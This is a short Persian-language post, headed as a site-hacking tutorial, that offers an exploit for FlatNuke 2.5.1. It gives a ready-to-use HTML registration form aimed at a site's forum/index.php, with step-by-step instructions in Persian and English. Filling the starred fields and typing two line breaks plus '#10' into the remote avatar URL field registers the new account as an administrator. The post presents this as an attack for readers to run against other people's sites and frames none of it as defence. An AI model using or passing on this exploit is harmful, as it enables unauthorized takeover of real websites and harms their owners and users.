آموزش هک سایت

سلام دوستان
باگي که براي FlatNuke 2.5.1 وجود داشت من اکسپلويت اين باگ رو پيدا کردم و براتون گذاشتم تو سايت فقط لازم به ذکر است که بايد اين exploite رو در يک فايل txt اديت کنيد و پس از اديت کردن (جانشين کردن آدرس سايت و يوزر و پسورد )
آن را save کرده و پسوندش را به html تبديل کنيد .
<form action="http://www.sitewithflatnuke.org/forum/index.php" method=post name="registra"> <input type=hidden name=op value=reg> Username*: <input name=nome><br> Password*: <input name="regpass" type="password"><br> Password*: <input name="reregpass" type="password"><br> Name: <input name=anag><br> E-mail: <input name=email><br> Homepage: <input name=homep value="http://"><br> Job: <input name=prof><br> Country: <input name=prov><br> <select name="ava"> <option value="">—-</option> <option value="blank.png">blank.png</option> </select> <br><br> Or remote image URL:<br><br> <textarea name="url_avatar" rows=5 cols=23>

 

Open the form in a Web browser and enter information in all fields. In the url_avatar field, press Enter at least twice and insert the text "#10" without quotes. Submitting this form will cause the account to be created as an administrator account.

بعد فايل save شده html رو با web browser باز کرده و گزينه هاي ستاره دار را پر کنيد
فقط در قسمت Or remote image URL دو تا اينتر زده و مقدار “#10″ رو وارد کنيد و send رو بزنيد .

منبع ها: http://saeid.matrixco.net/ و http://www.persian-empire.tk